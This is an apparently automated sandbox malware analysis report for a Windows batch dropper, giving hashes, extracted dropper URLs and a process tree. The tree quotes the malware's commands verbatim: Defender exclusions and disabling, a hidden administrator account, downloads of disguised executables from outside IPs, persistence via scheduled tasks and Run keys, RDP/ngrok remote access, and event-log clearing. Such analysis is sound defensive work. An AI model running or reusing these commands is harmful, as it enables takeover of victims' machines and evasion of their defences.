Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
  • submitted
    24/10/2024, 17:40

General

  • Target

    xdr.bat

  • Size

    4KB

  • MD5

    9e779d369e3ca17fdc894d13c4fd797a

  • SHA1

    bf7e34e0da33a587177e66cfcec51f3aa75b4a87

  • SHA256

    15dd389f66e269ea795710fa580b7e403d628f281c71ebf4d845dbc7d0bdf394

  • SHA512

    ab290641c94cd7d3270a236af9f1e849ea056fddcf3120afc3dbad61afd63453eca3732093799cc6b82f2275da74d374c453a324fa9e465d931d2dff71b351b1

  • SSDEEP

    96:IQ356afgPZCo/r+ab5iGp8HRI3h8UfpTsbUdGD:Iw56afgQHRq8UfGbdD

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://45.139.196.250/ngrok.yml

http://45.139.196.250/ngrok.zip

http://152.89.239.119/x222.jpg

http://45.139.196.250/WindowsUpdate.jpg

http://45.139.196.250/auto-install-hrdp.bat

http://45.139.196.250/hrdp/hrdp.zip

http://45.139.196.250/hrdp/update.zip

http://45.139.196.250/hrdp/autoupdate.zip

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Sets file to hidden 1 TTPs 4 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\xdr.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell -windowstyle hidden Add-MpPreference -ExclusionPath 'C:'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2400
    • C:\Windows\system32\cmd.exe
      cmd /C net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2812
      • C:\Windows\system32\net.exe
        net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
        3⤵
        PID:2824
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell Add-MpPreference -ExclusionPath 'c:\'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2560
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1332
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell Add-MpPreference -ExclusionPath 'C:\programdata\Windata'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2376
    • C:\Windows\system32\net.exe
      net user t1 Raed12346@@ /add
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1936
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user t1 Raed12346@@ /add
        3⤵
        PID:2276
    • C:\Windows\system32\net.exe
      net localgroup administrators t1 /add
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1992
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 localgroup administrators t1 /add
        3⤵
        PID:1748
    • C:\Windows\system32\net.exe
      net localgroup Administrat├╢rer t1 /add
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1652
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 localgroup Administrat├╢rer t1 /add
        3⤵
        PID:2296
    • C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v t1 /t REG_DWORD /d 0 /f
      2⤵
      • Hide Artifacts: Hidden Users
      PID:1508
    • C:\Windows\system32\net.exe
      net user t1 /active:no
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2860
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user t1 /active:no
        3⤵
        PID:1872
    • C:\Windows\system32\net.exe
      net user t1 /active:yes
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1744
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user t1 /active:yes
        3⤵
        PID:2040
    • C:\Windows\system32\ReAgentc.exe
      reagentc.exe /disable
      2⤵
      • Drops file in System32 directory
      PID:2852
    • C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
      2⤵
      PID:1004
    • C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f
      2⤵
      PID:2356
    • C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v LockScreenToastEnabled /t REG_DWORD /d 0 /f
      2⤵
      PID:2576
    • C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\MSEdge" /v Enabled /t REG_DWORD /d 0 /f
      2⤵
      PID:1384
    • C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f
      2⤵
      PID:2348
    • C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f
      2⤵
      PID:2980
    • C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      PID:1832
    • C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f
      2⤵
      PID:1756
    • C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
      2⤵
      PID:1424
    • C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d "1" /f
      2⤵
      PID:476
    • C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      PID:968
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.yml','C:\Users\Admin\AppData\Local\ngrok\ngrok.yml')
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:400
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.zip','C:\ProgramData\Windata\ngrok.zip')
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2172
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/x222.jpg','C:\ProgramData\Windata\winlogin.exe')
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1296
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/WindowsUpdate.jpg','C:\ProgramData\Windata\WindowsUpdate.exe')
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2020
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell Expand-Archive "ngrok.zip" -DestinationPath "."
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1052
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/auto-install-hrdp.bat','C:\ProgramData\Windata\installer.bat')
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1548
    • C:\Windows\system32\attrib.exe
      attrib +s +h C:\programdata\Windata
      2⤵
      • Sets file to hidden
      • Views/modifies file attributes
      PID:2340
    • C:\Windows\system32\attrib.exe
      attrib +s +h C:\programdata\Windata\*.*
      2⤵
      • Sets file to hidden
      • Views/modifies file attributes
      PID:552
    • C:\Windows\system32\attrib.exe
      attrib -s +h C:\programdata\Windata\*.bat
      2⤵
      • Sets file to hidden
      • Views/modifies file attributes
      PID:1268
    • C:\Windows\system32\schtasks.exe
      schtasks /create /tn WindowsPowerup /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:3024
    • C:\Windows\system32\schtasks.exe
      schtasks /create /tn Winlogo /ru "Admin" /sc minute /mo 5 /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:1416
    • C:\Windows\system32\schtasks.exe
      schtasks /create /tn WindowsUp /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:2012
    • C:\Windows\system32\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsPowerup" /t REG_SZ /F /D "C:\ProgramData\Windata\srlhost.exe"
      2⤵
      • Adds Run key to start application
      PID:2244
    • C:\Windows\system32\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdatez" /t REG_SZ /F /D "C:\ProgramData\Windata\WindowsUpdate.exe"
      2⤵
      • Adds Run key to start application
      PID:1512
    • C:\Windows\system32\attrib.exe
      attrib -s +h C:\programdata\Windata\*.bat
      2⤵
      • Sets file to hidden
      • Views/modifies file attributes
      PID:2464
    • C:\Windows\system32\cmd.exe
      cmd /C C:\ProgramData\Windata\installer.bat
      2⤵
      • Drops file in Program Files directory
      PID:1420
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/hrdp.zip','C:\ProgramData\Windata\hrdp.zip')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:876
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Expand-Archive "C:\ProgramData\Windata\hrdp.zip" -DestinationPath "C:\ProgramData\Windata\hrdp"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1604
      • C:\Windows\system32\cmd.exe
        cmd /C C:\ProgramData\Windata\hrdp\install.bat
        3⤵
        PID:2672
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/update.zip','C:\Program Files\RDP Wrapper\update.zip')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2692
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/autoupdate.zip','C:\Program Files\RDP Wrapper\autoupdate.zip')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2708
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Expand-Archive "update.zip" -DestinationPath "."
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2560
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell Expand-Archive "autoupdate.zip" -DestinationPath "."
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2596
      • C:\Windows\system32\cmd.exe
        cmd /C "C:\Program Files\RDP Wrapper\rdpwrap_ini_updater.bat"
        3⤵
        PID:2120
      • C:\Windows\system32\cmd.exe
        cmd /C "C:\Program Files\RDP Wrapper\re-install.bat"
        3⤵
        PID:2188
      • C:\Windows\system32\cmd.exe
        cmd /C "C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat"
        3⤵
        PID:2184
      • C:\Windows\system32\cmd.exe
        cmd /C "C:\Program Files\RDP Wrapper\autoupdate.bat"
        3⤵
        PID:2056
    • C:\Windows\system32\cmd.exe
      cmd /C for /F "tokens=*" in ('wevtutil.exe el') DO wevtutil.exe cl ""
      2⤵
      PID:1976

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\ProgramData\Windata\hrdp.zip

    Filesize

    1.5MB

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

  • C:\programdata\Windata\installer.bat

    Filesize

    1KB

  • C:\programdata\Windata\ngrok.zip

    Filesize

    8.4MB

  • C:\programdata\Windata\winlogin.exe

    Filesize

    7KB
